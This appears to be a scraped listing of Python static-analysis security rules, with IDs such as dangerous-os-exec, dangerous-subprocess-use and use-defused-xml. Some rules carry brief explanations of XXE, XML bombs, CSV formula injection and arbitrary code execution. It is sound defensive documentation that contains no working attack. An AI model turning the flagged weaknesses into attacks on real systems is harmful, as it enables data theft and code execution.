dangerous-spawn-process
insecure-hash-algorithm-sha1
insecure-hash-algorithm-md5
dangerous-subinterpreters-run-string
run_string
. This is dangerous because it allows a malicious actor to run arbitrary Python code.use-defused-xmlrpc
dangerous-interactive-code-run
dangerous-globals-use
dangerous-os-exec
use-defused-xml-parse
xml
library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and “XML bombs” can cause denial of service. Do not use this library to parse untrusted input. Instead the Python documentation recommends using defusedxml
.use-defused-xml
defusedxml
instead of xml
because the native Python xml
library is vulnerable to XML External Entity (XXE) attacks. These attacks can leak confidential data and “XML bombs” can cause denial of service.dangerous-subprocess-use
unverified-ssl-context
use-defusedcsv
csv
module. If user data is used to generate the data in this file, it is possible that an attacker could inject a formula when the CSV is imported into a spreadsheet application that runs an attacker script, which could steal data from the importing user or, at worst, install malware on the user’s computer. defusedcsv
is a drop-in replacement with the same API that will attempt to mitigate formula injection attempts. You can use defusedcsv
instead of csv
to safely generate CSVs.dangerous-system-call
dangerous-testcapi-run-in-subinterp
run_in_subinterp
. This is dangerous because it allows a malicious actor to run arbitrary Python code.insecure-hash-function